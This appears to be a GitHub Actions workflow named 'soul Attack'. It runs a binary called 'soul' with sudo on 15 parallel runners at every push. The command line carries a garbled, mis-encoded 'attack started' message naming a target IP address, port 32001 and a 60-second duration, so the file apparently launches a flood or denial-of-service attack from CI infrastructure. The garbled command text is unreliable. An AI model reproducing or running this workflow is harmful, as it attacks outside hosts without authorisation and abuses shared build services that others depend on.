name: soul Attack
on: [push]
jobs:
  soul:
    runs-on: ubuntu-22.04
    strategy:
      matrix:
        n: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15]
    steps:
    - uses: actions/checkout@v3
    - run: chmod +x soul
    - run: sudo ./soul ğŸ¯ á´€á´›á´›á´€á´„á´‹ sá´›á´€Ê€á´›á´‡á´…!
â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”â”
ğŸŒ á´›á´€Ê€É¢á´‡á´›: 91.108.17.34
ğŸšª á´˜á´Ê€á´›: 32001
â±ï¸ á´›Éªá´á´‡: 60s
ğŸ–¥ï¸  733/1000 32001 50
